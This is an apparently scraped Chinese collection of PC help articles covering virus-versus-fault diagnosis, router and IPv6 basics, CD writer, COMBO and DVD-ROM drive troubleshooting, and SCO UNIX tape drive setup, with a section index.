3. 软件冲突：许多软件之间存在着一定的冲突，同时运行这些软件时就会出现一些故障。如用户若同时启动了两种不同的多内码支持软件，那么很容易出现死机的情况；再如我们若使用诺顿的NDD对磁盘进行检测，系统就会禁止其它任何磁盘操作软件的运行。因此广大用户一定要掌握这些软件之间的冲突，避免同时使用它们。
4. 软件自身被破坏：如果因为磁盘或其他一些原因导致应用软件被破坏，那么计算机也会出现不正常情况，如Format程序被破坏后，我们若再使用它就很容易格式化出非标准格式的磁盘，这就会产生一连串的错误，它们当然与病毒没有任何关系。
5. 系统配置不当：许多软件在运行过程中都要求某些特殊环境，如果用户的计算机不能满足它们的要求，这些软件也就无法正常运行。这就要求我们掌握不同软件的要求，并分别针对它们给出不同的运行环境，保证软件的正常运行。
6. 软件与操作系统版本的兼容性：操作系统自身具有向下兼容的特点，不过应用软件却不同，许多软件都要过多地受其环境的限制，在操作系统的某个版本下可正常运行的软件，到另一个版本下却不能正常运行（如许多在DOS下运行正常的软件到了Windows 95的DOS中就无能为力了，同样，许多基于Windows 95的应用程序也无法在Windows 98中运行）。因此用户需要注意这些软件与操作系统的兼容性。
上面我们介绍了常见的病毒现象，并列举了许多与病毒相似的软硬件故障，希望对广大用户的日常操作有所帮助。不过我们在学习、使用计算机过程中还有可能会遇到更多问题，所以广大用户要多阅读、参考有关资料，了解检测病毒的方法，并注意在学习、工作中积累经验，就不难区分病毒与软硬件故障了。


走马观花看路由

《一键清理系统垃圾》

返回总目录 上一页 目录页

走马观花看路由

    网络世界，是路由器把我们联系起来，它是互连网络的枢纽，网络的交通警察。那么在路由器方面新技术、新产品发展如何？IPv6技术又如何，不妨让我们把目光再次集中到这里。

    扬鞭上马话路由

    路由器将全球英特网的各子网联系起来，给人产生一个具有一个全球一致化单一网络的幻觉。路由器的主要作用是将从一组输入链路中收到的包转发给一组输出链路。同时，路由器应该能够处理异构网络、调度不同的服务要求、使用分布式算法产生一致化的路由表。此外，由于人们对英特网带宽的要求永无止境，路由器也自然应具有高带宽，所有这些因素决定了路由器的复杂性。路由器被称为“网络的巨型机”，确实，网络中用到的各种技术都可在路由器中得到综合的体现。

    一、路由器的类型

    英特网各种级别的网络中随处都可见到路由器。接入网络使得家庭和小型企业可以连接到某个英特网服务提供商（ISP）。企业网中的路由器连接一个校园或企业内成千上万的计算机。骨干网上的路由器终端系统通常是不能直接访问的，它们连接长距离骨干网上的ISP和企业网络。英特网的快速发展无论是对骨干网，企业网还是接入网都带来了不同的挑战。骨干网要求路由器能对少数链路进行高速路由转发。企业级路由器不但要求端口数目多、价格低廉，而且要求配置起来简单方便，并提供QoS。接入路由器要提供具有不同协议的高速异构思端口，并且力争不经过电话交接网。

    二、路由器的构成

    路由器具有四个要素：输入端口、输出端口、交换开关和路由处理器。

    输入端口是物理链路和输入包的进口处。端口通常由线卡提供，一块线卡一般支持4，8或16个端口，一个输入端口具有许多功能。第一个功能是进行数据链路层的封装和解封装。第二个功能是在转发表中查找输入包目的地址从而决定目的端口（称为路由查找），路由查找可以使用一般的硬件来实现，或者通过在每块线卡上嵌入一个微处理器来完成。第三，为了提供QoS，端口要对收到的包分成几个预定义的服务级别。第四，端口可能需要运行诸如SLIP和PPP这样的数据链路级协议或者诸如PPTP这样的网络级协议。一旦路由查找完成，必须用交换开关将包送到其输出端口。如果路由器是输入端加队列的，则有几个输入端共享同一个交换开关。这样输入端口的最后一项功能是参加对公共资源（如交换开关）的仲裁协议。

    交换开关可以使用多种不同的技术来实现。至今为止使用最多的交换开关技术是总线、交叉开关和共享存贮器。最简单的开关使用一条总线来连接所有输入和输出端口，总线开关的缺点是其交换容量受限于总线的容量以及为共享总线仲裁所带来的额外开销。交叉开关通过开关提供多条数据通路，具有N*N个交叉点的交叉开关可以被认为具有2N条总线。如果一个交叉是闭合，输入总线上的数据在输出总线上可用，否则不可用。交叉点的闭合与打开由调度器来控制，因此，调度器限制了交换开关的速度。在共享存贮器路由器中，进来的包被存贮在共享存贮器中，所交换的仅是包的指针，这提高了交换容量，但是，开关的速度受限于存贮器的存取速度。尽管存贮器容量每18个月能够翻一番，但存贮器的存取时间每年仅降低5%，这是共享存贮器交换开关的一个固有限制。

    输出端口在包被发送到输出链路之前对包存贮。可以实现复杂的调度算法以支持优先级等要求。与输入端口一样，输出端口同样要能支持数据链路层的封装和解封装，以及许多较高级协议。

    路由处理器计算转发表，实现路由协议，并运行对路由器进行配置和管理的软件，同时，它还处理那些目的地址不在线卡转发表中的包。

    三、各类路由器的特点

    （1）骨干级路由器

    英特网目前由几十个骨干网，每个骨干网服务几千个小网络，骨干级路由器实现企业级网络的互连。因而，对它们的要求是速度和可靠性，而代价则处于次要地位。硬件可靠性可以采用电话交换网中使用的同样的技术，如热备份、双电源、双数据通路等来获得。这些技术对所有骨干路由器而言差不多是标准的。所以这里要讨论的是如何获得高的路由速度。骨干IP路由器的主要性能瓶颈是在转发表中查找某个路由所耗的时间。当收到一个包时，输入端口在转发表中查找该包的目的地址以确定其目的端口，当包越短或者当包要发往许多目的端口时，势必增加路由查找的代价。因此，将一些常访问的目的端口放到Cache中能够提高路由查找的效率。不管是输入缓冲还是输出缓冲路由器，都存在路由查找的瓶颈问题。除了性能瓶颈问题，路由器的稳定性也是一个常被忽视的问题。

    （2）企业级路由器

    企业或校园级路由器连接许多终端系统，与骨干路由器追求速度而忽视代价不同，其主要目标是以尽量便宜的方法实现尽可能多的端点互连。并且进一步要求支持不同的服务质量。许多现有的企业网络都是由HUB或网桥连接起来的以太网段。尽管这些设备价格便宜、易于安装、无需配置，但是它们不支持服务等级。相反，有路由器参与的网络能够将机器分成多个碰撞域，并因此能够控制一个网络的大小。此外，路由器还支持一定的服务等级，至少允许分成多个优先级别。但是路由器的每端口造价要贵些，并且在能够使用之前要进行大量的配置工作。因此，企业路由器的成败就在于是否提供大量端口且每端口的造价很低，是否容易配置，是否支持QoS。另外还要求企业级路由器有效地支持广播和组播。此外，与骨干路由器仅支持IP协议不同，企业网络还要处理历史遗留的各种LAN技术，支持多种协议，包括IP，IPX和Vine, 它们还要支持防火墙，包过滤以及大量的管理和安全策略以及VLAN。

    （3）接入路由器

    接入路由器连接家庭或ISP内的小型企业客户。传统的接入网络用多个MODEM连接到某个终端服务器，服务许多慢速拔号连接。但是，现今的接入网络已不是如此简单了。首先，接入网络已使用诸如ADSL、高速MODEM、电缆MODEM等多种接入技术。其次，使用家中的电话线拨号上网增加了电话网的负担，因此，要尽量避免使用电话网来传输数据。第三，接入路由器已经开始不只是提供SLIP或PPP连接，还支持诸如PPTP和IPSec等虚拟私有网络协议。这些协议要能在每个端口上运行。最后，诸如ADSL等技术将很快提高各家庭的可用带宽，这将进一步增加接入路由器的负担。由于这些趋势，接入路由器将在不久的将来不得不支持许多异构和高速端口，并在各个端口能够运行多种协议，同时还要避开电话交换网。

    路由器技术与应用问答

    路由器具备条件和特点

    路由器必须具备的基本条件：①两个或两个以上的接口；②协议至少实现到网络层；③至少支持两种以上的子网协议；④具有存储、转发、寻径功能；⑤一组路由协议。路由器的主要特点有：①路由功能，包括数据包的路径决策、负载平衡、多媒体传输（多播）等；②智能化网络服务，包括QoS、访问列表（防火墙）、验证、授权、计费、链路备份、调试、管理等。

    路由器的体系结构

    从体系结构上看，路由器可以分为第一代单总线单CPU结构路由器、第二代单总线主从CPU结构路由器、第三代单总线对称式多CPU结构路由器、第四代多总线多CPU结构路由器、第五代共享内存式结构路由器、第六代交叉开关体系结构路由器和基于机群系统的路由器等多类。

    对处理能力要求高

    首先，对路由器处理能力提出要求的是公用数据网上的骨干网。Internet提供的业务越来越丰富，用户数目也迅速增长，驱使骨干网的带宽速率越来越高。另外，多媒体应用越来越广泛，这些应用对IP网络有着更苛刻的要求。同时，传统的局域网互联也对骨干网提出了更高的要求。这些都是推动IP网络路由器技术不断提高其接口带宽及处理能力的客观因素。

    多播适合于什么环境

    为了适应Internet网络上一点对多点传送应用的需要（如天气预报、网络会议等），出现了一种新的传输模式——多播（Multicast）。多播主要用于视频会议等应用场合，这种应用需要同一份数据能同时发送给多个用户。多播适合于一点到多点的广播式传输环境，同时也可适用多点到多点、多点到一点的传输情况。多播具有带宽利用率高、减轻主机和路由器负担、避免目地址不明所引起麻烦的优点。多播网中可能有不支持多播的路由器，此时多播路由器使用“IP over IP”的隧道方式将多播包封装在单播IP包中透传给相邻的多播路由器。相邻的多播路由器再将单播IP头剥掉，然后继续进行多播传输。

    怎样选择合适的路由器

    选择路由器还应遵循如下基本原则：①标准化原则；②技术简单性原则；③环境适应性原则；④可管理性原则；⑤容错冗余性原则。（张长青）

    IPv6：快马加鞭赶路程

    IPv4资源日益紧张，为了解决这一问题，出现了IPv6新技术，下面我们探讨几个IPv6路由技术的问题。

    路由表

    IPv6网络由一定数量的以部分交错网格的形式互相连接的路由器组成。路由器的主要任务取决于所采用的网络结构，IPv6使用一种通过网络地址进行路由的技术。当信息包通过本地或者地理网络接口到达一个路由器时，路由器把信息包转交给它的转发进程，这个进程分析发送地址，然后用这个地址来检查路由表，并且确定向哪个接口传送信息包。路由器上的路由表在IPv6路由中起到了非常重要的作用，对于路由器本身可以达到的子网，IPv6路由器的路由表只包含它的一个条目。路由表由子网、下一个路程段、类型、成本、期限和状态等字段组成。路由表可以由合适的协议，如RIP或者OSPF等，手工或自动写入。

    路由算法

    IPv4使用的路由算法不再适用，因为它们不能传送128位的IPv6地址。IPv6使用三种主要协议：RIPv6(Routing Information Protocol，路由信息协议)、OSPFv6(Open Shortest Path First，开放最短路径优先)和IDRP v2(Inter-Domain Routing Protocol，域间路由协议 )以及可能的EIGRP和双层的IS-IS。RIPv6是可以与IPv6共同使用的RIP版本。更新的RIP允许其接收128位地址，没有增加新特性，没有消除以前限制的相关前缀长度。这种选择的原因是为了保持RIPv6的简单性，由此它可以在非常简单的设备上实现。OSPFv6是可以用于IPv6的OSPF版本，它也是IPv6推荐的IGP协议，作为所有路由器厂商的标准实现，它适于大型网络。OSPFv6作为OSPF的更新，允许传送新的128位地址和相关的前缀长度，在OSPFv6中，区域定义为128位地址。IDRP是和IPv6共同使用的的EGP协议，IDRP是一个路径矢量协议，在OSI结构中是设计在CLNP ISO 8473协议使用的，在Internet上作为EGP从BGP-4得出，适于和IPv6共同使用的IDRP版本是IDRPv2。

    邻居发现

    当一个信息包必须在子网上进行路由时，传输过程必须在2层完成，也就是链路层。在一个子网中保持3层地址和链路层地址之间的映射可以使用多种方法。最著名的方法是基于ARP的，IPv4中采用了这种方法，但是在IPv6中使用了新的邻居发现协议。主机能够了解到在一个链路上哪个路由器可以使用，也允许主机通过重定向信息包获知哪个是最佳路由器，也允许所有的节点了解IPv6地址和链路地址的映射情况。这些功能是通过以下5种类型的信息实现的：路由宣告、路由器请求、路由重定向、邻居请求和邻居宣告。

    多点传送路由

    多点传送路由是指目的地址是一个多点传送地址的信息包路由。在IPv6中，多点传送路由的问题与IPv4中类似，只是功能有所加强，分别成为了ICMPv6和OSPFv6的一部分，而不是IPv4中的单独协议，从而变成为IPv6整体的一部分。为了路由多点传送信息包，IPv6中创建了一个分布树（多点传送树）到达组里的所有成员。

    结论

    IPv6在路由技术上继承了IPv4的有利方面，代表未来路由技术的发展方向，许多路由器厂商如CISCO、NOKIA等目前已经投入很大力量以生产支持IPv6的路由器。当然IPv6也还有一些值得注意和效率不高的地方，据业内人士分析，IPv4/NAT和IPv6将会共存相当长的一段时间。

返回


病毒木马加解密

《一键清理系统垃圾》

返回总目录

病毒木马加解密

◎ADSL防御黑客攻击的十大办法
◎CMOS开机密码解密集锦
◎CMOS开机密码解密集锦
◎DDoS攻击的趋势与防御策略
◎DDoS攻击的趋势与相关防御策略
◎Novell网如何防毒
◎VCD 加密破解
◎WIN9X下的入侵方法
◎Wininit.ini文件与Windows 病毒
◎在Windows XP中对文件进行加密
◎病毒从何而来
◎病毒杂谈及预防知识
◎不可小视 选购杀毒软件有六大注意
◎菜鸟除马记
◎[转帖]查看开放端口判断木马
◎彻底清除IE内部顽固病毒
◎电脑病毒有哪几种类型
◎恶意病毒“四大家族”
◎恶意网页病毒十三大症状分析及简单修复方法
◎防范邮件蠕虫病毒绝对实用四秘籍
◎防御网络游戏外挂木马全攻略
◎分析木马客户端与服务端隐蔽通讯
◎个人计算机防范小黑客完全攻略
◎关于动态嵌入式DLL木马病毒的发现及清除
◎何为木马程序
◎何谓电脑病毒
◎黑客攻击方式的四种最新趋势
◎黑客入门教程
◎计算机病毒
◎计算机病毒史
◎计算机病毒杂谈
◎计算机病毒知识大全
◎加密光盘破解不完全功略
◎简单入侵
◎看看黑客是否光顾过你的电脑
◎快马加鞭20秒进入Windows XP操作系统
◎快速清除Windows 98下的Folder.htt病毒
◎零基础53个黑客在线教程
◎判断电脑是否感染了病毒
◎破解加密光盘五式
◎浅析中小网站如何对付 DoS(拒绝服务)攻击
◎NTFS格式下加、解密问题
◎如何判断你的电脑是否含病毒
◎手机密码
◎网络时代的病毒浅释
◎我是一个黑客
◎修改注册表提高Win2000抗拒绝服务攻击能力
◎用金山毒霸修复硬盘一例
◎用双系统进行简单加密
◎正确区分计算机病毒与软硬件故障
◎走马观花看路由

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


CD—Writer 6020再生记

《一键清理系统垃圾》

返回总目录 目录页 下一页

CD—Writer 6020再生记

    CD－Writer 6020是HP公司前几年推出的一款刻录机产品。该机含SCSI接口，最高2倍速刻录，其稳定的刻录性能颇令人称道。笔者所在单位使用的CD－Writer 6020 “服役”已经三年多了，刻录的光盘不下数百张。但是时间久了，这台刻录机变得有点老态龙钟，刻录出来的光盘自己读不出来，放在其他光驱上还能读，不过将刻录速度换成1倍速后情况有所改善，反正还能凑合，时间虽然慢一点，结果还算行；接下来情况越来越糟，刻录过程常莫名其妙地出现中断，最后变成一种现象：开始刻录的时候一切正常，当刻录到70多兆屏幕提示约13％时，刻录过程中断且程序出现死机，前功尽弃，光盘报废。重新启动计算机后又可重复上述过程。试着刻录小于80兆的文件，刻录过程完全正常，光盘在其他光驱上能够正常使用。
    计算机系统的配置如下：主机COMPAQ P5133，内存32M，硬盘2.1G，SCSI接口板S8100；系统软件WIN95，刻录工具软件Easy CD Creator。然而检查了软件方面和盘片方面，现象依旧，焦点又回到刻录机本身。
    能刻录短文件且能不断重复，说明刻录机激光头基本没问题，难道驱动电路有问题？如果电路故障无戏可唱，会不会是其它问题？抱着一丝希望，打开机箱，拆下刻录机，对其作进一步检查。
    CD－Writer 6020 结构并不复杂，稍费点工夫就把部件大块地分离，由于机房清洁条件较好，机内没有明显的灰尘，驱动机构推动手感正常，蓝色的激光头罩着凸透镜，读写共用一个头，用放大镜观察没有看到浮灰，没有找到任何可以调节的地方用来调节激光头功率。似乎已经偏向于安排其“下岗”了。就在准备盖上外壳的时侯猛然想起忽略了一个常识：激光头蓝色的表面上的空气污染肉眼未必能看出！于是赶紧准备清洗。在光头表面滴上一滴蒸馏水，用棉球轻轻地擦几下然后吹干，就在我把手抬起来的时候眼睛突然一亮，因为我看到白色的棉球呈淡淡的黄颜色，我赶紧将拆散的部件装起来，连到计算机上，放入空白光盘，设置1倍速刻录，开始烧光盘，80兆的门槛轻松越过，约半个小时刻完560兆整张光盘，Closing Session后出现结束提示，当按下“确定”后光盘仓自动弹出，刻录圆满结束。接着再用2倍速操作一遍。刻录的光盘刻录机本身能识别了，放到其它光驱上都能顺畅读出：CD－Writer 6020 获得再生！
    CD－Writer 6020 获得再生的过程说明，透镜表面的污染是造成刻录机不能完全刻录的根源。在长期的使用过程中，高速旋转的盘片在光头附近形成的离心力对光头的空气污染时常发生，由于光头呈蓝色，在蓝底色上肉眼几乎看不清污染。所以有故障的时候别忘了清洗光头，以上经历希望能给使用刻录机的朋友有所启发。


COMBO问题应用集锦

《一键清理系统垃圾》

COMBO问题应用集锦

    康宝在进入台式机光存储市场之后，以一机多用受到了大家的欢迎，但是不少怀疑的声音也随之而生。在第一代康宝上市后的一年里，很多朋友在使用时遇到了不少的麻烦，这次龙哥就专门针对康宝产品为大家释疑。

    刻录方面的问题

    1．SM－316B 康宝不能刻录24X BenQ刻录盘的问题

    现象：去年7月底购买的三星SM-316B 康宝产品，以前一直刻录CD-RW都很顺利，我从朋友那儿借了一张BenQ 24X的CD-RW盘，放入康宝中进行刻录时，软件提示“不能识别当前刻录光盘，请放入CD-R或者CD-RW”。我更换了不少的刻录软件都不能进行刻录。

    问题分析和解决：由于康宝标称CD-RW速度为10X，而当时同时代的刻录机的CD-RW刻录速度也只能达到12X。而现在市面上主流52X刻录机进行CD-RW刻录的速度已经能够达到24X，所以市面上才会有24X的CD-RW盘片出售。由于此种盘片是才出现的新产品，所以老款刻录机的固件并没有内建对此种盘片的支持，所以才会出现刻录机不能够识别24X CD-RW盘片的现象。现在有两个解决办法：一、更换低速的CD-RW盘片进行刻录。二、等待三星公司推出SM-316B的新固件，然后把固件刷新为最新版本即可。

    2．SM－316B 康宝不能刻盘问题

    现象：一台SM-316B 康宝使用nero5软件选择“复制光盘”时，光盘开始往硬盘里面复制，但是复制到99%时报错；而选择直接拖放文件刻录时，一刻到4%开始读取缓冲区时指示灯常亮，时间一直在走，但是缓冲区依旧为0%。结果是盘片报废，更换了多款刻录软件之后依旧为同样的问题。

    问题分析和解决：您可以先从硬件问题着手，再从软件问题着手。首先查看康宝驱动的IDE连线是否松动，然后查看盘片是否有问题；如果硬件上没有问题，您就可以从软件方面开始查找问题，首先更换一下刻录软件的版本，尽量使用版本较新的刻录软件，然后查看存放缓冲区文件的那个分区的硬盘空间是否小于缓冲区的容量设置。如果一切检查都没有问题的话，只能考虑康宝本身的硬件损坏问题了。

    3．SM－348B降速刻录的缘故

    现象：新购买了一部三星SM-348B 48X 康宝，同时还购买了一些刻录光盘，盘片为水蓝盘，标称80分钟/700M、48X，但是在nero5中，盘片却被认为32X，只能用32X进行刻录，为什么标称48X的刻录盘不能进行48X刻录呢？

    问题分析和解决：由于三星SM-348B 康宝的固件对盘片的要求非常严格，如果刻录盘稍微有些不符合标准，就会自动被刻录机降低刻录的速度，以保障在刻录的过程中不会出现飞盘现象。要解决以上的问题，龙哥建议您购买质量较好的大厂刻录光盘，市面上售价在1.8元以上的光盘质量都是非常不错的。

    4．康宝无法识别用Direct CD软件格式化过的光盘

    现象：我的操作系统上有多个刻录软件，一个是nero5，还有一个就是Dircet CD，为什么我使用Dircet CD格式化了刻录盘之后，放在康宝里却不能读取？

    问题分析和解决：由于Dircet CD是一种使用UDF文件系统记录数据的软件。因此，采用ISO 9660标准的康宝是无法读取用Dircet CD刻录的光盘的。如果要识别使用Dircet CD格式化过的光盘请安装UDF Reader软件，您可以在ftp://ftp.roxio.com/roxio/products/en/udf/

    udfread_v501-191_inst.exe下载这个软件的最新版本。
    三星系列康宝区码限制和固件刷新问题

    1．三星康宝带有区码限制，是真的么？

    现象：据宣传资料介绍，三星系列康宝产品都是带有区码限制的。由于我收藏的都是正版的1区和3区的DVD影片，如果这样的话，那岂不是看了几部电影之后区码就锁住了，有没有什么方法能够破解三星康宝的区码限制？

    问题分析和解决：为了为了保护知识产权，所以厂家在康宝出厂时都锁定了区码，您只能有权更新5次区码，如果超过了次数，DVD的区码将锁定在最后那次的区上。由于厂家并不支持破解版的区码，所以大家在三星的网站上找不到破解版的固件。但是不少朋友也下载到了三星全系列破解版固件，并进行了刷新。（龙哥提示：从保护知识产权的角度考虑，这种做法是不可取的。而且破解版的固件并不是三星公司所发布的，如果在刷新破解版固件时造成了损坏，三星公司是不负任何责任的，请大家三思而后行！）

    2．在Windos 2000系统下不能进行固件刷新

    现象：我使用的操作系统是Windows 2000专业版，而且我也下载了三星SM-316B的固件刷新程序和固件。由于刷新程序支持在Windows下进行固件刷新，所以我就在Windows环境下刷新，但是当我装载了固件程序后，点击“刷新”，刷新进度条不动，不能刷新，请问是怎么一回事？

    问题分析和解决办法：虽然此款软件支持Windows环境下刷新，但是实际上这个刷新程序是不支持Windows 2000的，所以建议您在Windows 98或者Windows XP下进行刷新程序。

    三星康宝读盘和保养等问题

    1．三星SM－316B 康宝读盘噪音大和震动较大问题

    现象：我去年购买的三星SM-316B 康宝在使用了一段时间之后，发现这款康宝在读盘时噪音和震动都很大，而且发热量也不小。请问有没有什么方法来解决噪音和震动问题？

    问题分析和解决：由于三星SM-316B 康宝采用的是全金属光头驱动设计，其余部分的材质改为了塑料，所以在运行时，热量并不能即时散发出去，而导致热量聚集在机身内部，所以您会感觉三星的康宝在运行起来会非常热（其实，别的品牌DVD-ROM工作起来一样比较热，这里只是相对而言）。对于震动的问题，由于电机马达高速运转，震动是无法避免的，但是如果您的机箱不够牢固或者康宝没有安装牢固，康宝工作起来就会与机箱产生共振，导致噪音和震动都非常大。（龙哥提示：尽量避免读取盗版光盘，因为盗版光盘的盘片质量都很差，读取此类的光盘不光会缩短光头的寿命，而且激光头在读取时不能准确定位，更加增加了噪音。对于散热问题，建议您最好在刻完三张光盘之后就让康宝休息一下，以免机芯过热而缩短寿命。）

    2．为什么康宝读取DVD时碟片会很烫

    现象：我的康宝在读取DVD影片时，即使在冬天，当看完一部电影后，把碟片拿出来都感觉碟片比较热，而夏天更是烫手。为什么会有这样的问题？

    问题分析和解决：由于现在光驱的速度已经非常高了，光驱内部的机芯转速也非常高，光驱内部的电机以及齿轮在读盘时都在高速运转，这些机件散发出大量的热量，此外电路芯片也会在工作时散发热量。目前，光驱速度都已经提高到了40倍速左右，几乎所有的光驱在运行时内部都非常热。因为一部电影起码要播放两个小时，而光盘也会一直在驱动器里连续运行两个小时，自然光盘在取出后感觉会非常烫手，这是正常的。虽然按照厂家的说法，长时间工作并不会影响读盘性能，但是龙哥建议您不要长时间用康宝看DVD影片。在这里，龙哥向您推荐一个很不错的软件，这款软件的名字为“DVDIdle”，它的工作原理与虚拟光驱类似。此款软件支持现在流行的PowerDVD、WinDVD和媒体播放器，您也可以自行加入对其他播放器的支持。

    康宝播放CD的问题

    1．康宝前置面板耳机插孔播放CD无声音的问题

    现象：最近我购买了一款三星SM-348B康宝驱动器，当我在驱动器中放入一张CD开始播放时，我发现当我把音箱接在耳机插孔上听不到声音，请问这是为什么？如何解决？

    问题分析和解决：出现这种情况可能是您没有使用相关的软件来播放或者音量旋钮没有调节好的缘故。对于这种情况，您可以首选查看CD是否已经在播放，如果没有的话，请首先使用专用的CD播放软件来播放CD，这样您就会听见声音了。只要CD开始播放了，前置面板上的耳机插孔就一定能够听到声音；如果您依然听不到声音，请检查音量调节旋钮，查看是否音量旋钮被设置在了最小的位置。

    2．使用康宝刻录的CD能在光驱播放，但是不能在CD机中播放的问题

    现象：最近我用康宝刻录了不少的CD，但是我发现，我用康宝刻录的CD可以在电脑的光驱上播放，而拿到CD机和音响上却不能播放，请问这是什么问题？

    问题分析和解决：出现这样的问题很可能是由于您的刻录方法不正确造成的。请查看您是否采用了这样的刻录方法：一、音频CD是在ISO 9660模式下进行刻录的；二、音频数据是刻录在CD-RW光盘上的；三、刻录时，最后一个区段没有被关闭；四、采用了多区段的刻录方式。

    如果您想要使您刻录的CD能够在CD机或者音响上播放，请按照以下的步骤来刻录CD盘：一、最好是使用Jullet模式来刻录光盘而不是ISO9660模式刻录音频CD；二、由于通常CD播放器无法识别CD-RW盘片，所以建议您使用CD-R盘来进行刻录；三、在刻录时一定要确定最后一个区段要被关闭才可以；四、检查所用的CD播放器是否支持多区段读取功能，如果不能，您只有在刻盘时采用单区段的方式来刻录了。（提示：建议大家在刻录CD时选用质量较好的金盘来刻录，并且刻录的速度保持在8X以内的低速度，这样CD的音质才能够保持在最佳状态。）


DVD-ROM读盘故障的检修

《一键清理系统垃圾》

DVD-ROM读盘故障的检修

    DVD-ROM读盘故障的维修方法与CD-ROM有很多相似之处，但它的光通道系统非常复杂，而且不同品牌的结构也并不完全相同。因此，我们在维修DVD-ROM的时候，必须首先了解手中故障DVD-ROM光通道系统的结构和工作原理，有的放矢地进行处理。下面笔者将结合几个故障检修实例，介绍一下检修DVD-ROM的方法和注意事项。

    故障现象一：只能读取数据盘且极不稳定，并且无法播放DVD。

    故障光驱品牌：先锋6倍速DVD-ROM。

    故障分析：先锋自有品牌以及一些OEM的DVD-ROM，使用的是其自家研发的“双聚焦单镜头配液晶光圈”的光通道系统。它在读取数据盘和DVD电影时，使用的是同一组激光发生器和物镜镜头，利用一组液晶快门来控制激光束的聚焦，以分别适应读取数据盘和DVD电影对激光束波长的不同需求。当同时出现读取数据盘不稳和无法读取DVD数据的故障时，我们基本上就可以断定是光通道或激光头部分出现了问题。这一点与使用时间较长的普通CD-ROM的不读盘故障本质上是完全一样的,所不同的是DVD-ROM的光路系统比较复杂一些。在维修的时候一定要胆大心细，拆解时必须注意仔细观察每一个需要拆卸的部件，并且牢牢地记住它们所处的位置，记忆不好的话最好用纸和笔将其一一记录下来，以便在还原时能够保证它们的原始安装位置正确，这一点对于非专业维修人员尤为重要。

    故障排除：此DVD-ROM采用吸盘式结构，拆卸过程比一般的CD-ROM稍微复杂一些，不过由于没有什么特殊的地方，限于篇幅在此笔者就不具体介绍了。您只要记住“维修光驱拆、落、上，不怕不会就怕忘”这句口诀，便可顺利完成故障光驱的拆解、复原工作。

    在光盘托架上放一张DVD光盘，通电后仔细观察，发现激光头有红色激光束发出，聚焦、寻道动作也基本正常，但是光盘高速旋转一段时间后，便转为以较低的转速旋转了。此时激光头复位且不再有任何动作，退盘后放入一张数据盘，光头组件依然重复上述过程，但是有的时候可以读出数据。

    首先，我按照一般的维修思路，用脱脂棉粘一点无水酒精仔细清洗了物镜，待酒精挥发后用放大镜观察，发现并没有物镜被“刮花”的迹象。再一次重复上面的检查过程，发现数据盘的读取有所好转，而观看DVD电影依然不行。在一般情况下，液晶阀及驱动电路如果出现故障的话，光驱会出现完全无法读取数据的现象。此DVD-ROM已经使用很长一段时间，据此判断故障应该属于激光发射元件老化，看来只有通过调整其发射功率来解决了。

    DVD-ROM的发射功率调整方法与CD-ROM的调整方法基本一致。在DVD光头组件上有一个用于调整的小型可变电位器，将它逆时针调整一定角度，然后检查读取效果，直到故障消失为止。不过一定要注意，每一次调整的角度不可过大，找到能够顺利读取各种光盘的那一点后，试着向相反的方向调回一点点再试，这样对延长光驱的使用时间比较有利。通过调整后，这台DVD-ROM读取数据盘、播放DVD都可以正常进行了，随后恢复所有拆解的部件并通电试机，这台DVD-ROM的故障终于彻底排除了。

    故障现象二：可以播放DVD影碟但不能读取数据盘。

    故障光驱品牌：创新6倍速DVD-ROM。

    故障分析：创新公司生产的DVD-ROM，采用单镜头、单光头双波长的光头组件。它的特殊地方就在激光头内部，分别装有两个相对独立的激光发射管，并分别发射780nm和650nm波长的激光束，以便适应数据盘和DVD影碟对波长的不同要求。由于购买时间较早，在当时DVD盘很少的情况下，它的主要任务还是读取数据光盘，因此用于发射780nm光束的激光管使用非常频繁，而650nm的DVD发射管则使用较少，这样便造成了可以正常播放DVD影碟，但不能读取数据光盘的故障。因此我们可以肯定的是，780nm的发射管已经老化，出现了发射功率降低的情况。唯一的补救方法依然是调整光头的输出功率。

    故障排除：首先打开DVD-ROM的外壳，用脱脂棉将物镜上的灰尘清除。用一把自制的三角口螺丝刀，卸下挡在光头组件侧面的盖板，在露出的光头组件的印刷电路板上，有两个绿豆般大小的可调元件，它们就是调整激光管发射功率的元件。一定要注意，正中间的那一个是调整DVD管的，而靠近电路板边缘的那个才是调整数据盘的。一切复原后该DVD-ROM的故障排除。

    总结：DVD-ROM的故障基本上都是发生在光头和光通道上，控制电路部分发生故障的概率非常低，加上其结构精密复杂，配件又比较难找，对非专业人员来说，维修的难度是比较大的。但随着DVD-ROM的快速普及，如果DVD-ROM不用再兼容CD-ROM盘的话，光头结构就可以进一步简单化了，这样产生故障的几率也会相应降低一些。


SCO XENIX/UNIX系统磁带机及光驱的安装

《一键清理系统垃圾》

SCO XENIX/UNIX系统磁带机及光驱的安装

一、磁带机的安装方法
    磁带和软盘一样都是备份数据和程序用的媒介,使用软盘必须有软盘驱动器,同样使用磁 带也必须有磁带机。

    现在磁带的容量有多种,最先出现的是45MB、60MB、100MB,接着为125MB(120MB)和155M B(150MB)、200MB、250MB,最近又出现了525MB、1.0GB、1.2GB、2.0GB、2.5GB、4.0GB和5. 0GB的磁带,将来容量会越来越大,它的大容量好处会越来越明显。

    磁带的容量不同,磁带的格式也不同,磁带的格式有早期的QIC-24、QIC-40、QIC-80,随 后发展成为QIC-120、QIC-150,现在又发展成为QIC-525、QIC-1000、QIC-2GB、QIC-2GB AL DC、QIC-3040等。

    随着科技的发展,磁带机的型号有多种,UNIX系统根据设备分为Cartridge、Mini-Cartr idge、QIC-40或QIC-80和SCSI接口。根据磁带机控制器类型又可分为ARCHIVE、Wangtek、E merald、Mountain、Tecmar、Everex、Tandberg等,而Xenix系统根据每种类型的第一个字母 分别简称为A、W、E、M、T、X型等(注:Everex简称X型)。

    随着科技的发展,出现了多种总线,有:ISA、EISA、PCI等,设备级接口也发展几种类型, 有ST506接口、ESDI接口、SCSI接口、IDE接口和EIDE接口等。很多设备如CD-ROM、磁带机等 ,每一个SCSI接口可以接七个设备,每一个设备分配不同的设备ID号(0～6),其中7分配给SCS I控制器,同一个SCSI通道上的设备一定不能有相同的ID号,否则会发生设备冲突,所以在安装 设备前先查看硬件上有无冲突,如发生冲突要先改硬件参数,SCSI共有四种标准:SCSI-Ⅰ、S CSI-Ⅱ、FAST SCSI-Ⅱ、FAST/WIDE SCSI-Ⅱ,微机上现在常用的SCSI为SCSI-Ⅱ和FAST SCS I-Ⅱ。

    现将Wangtek和Tandberg安装方法介绍如下供大家参考:

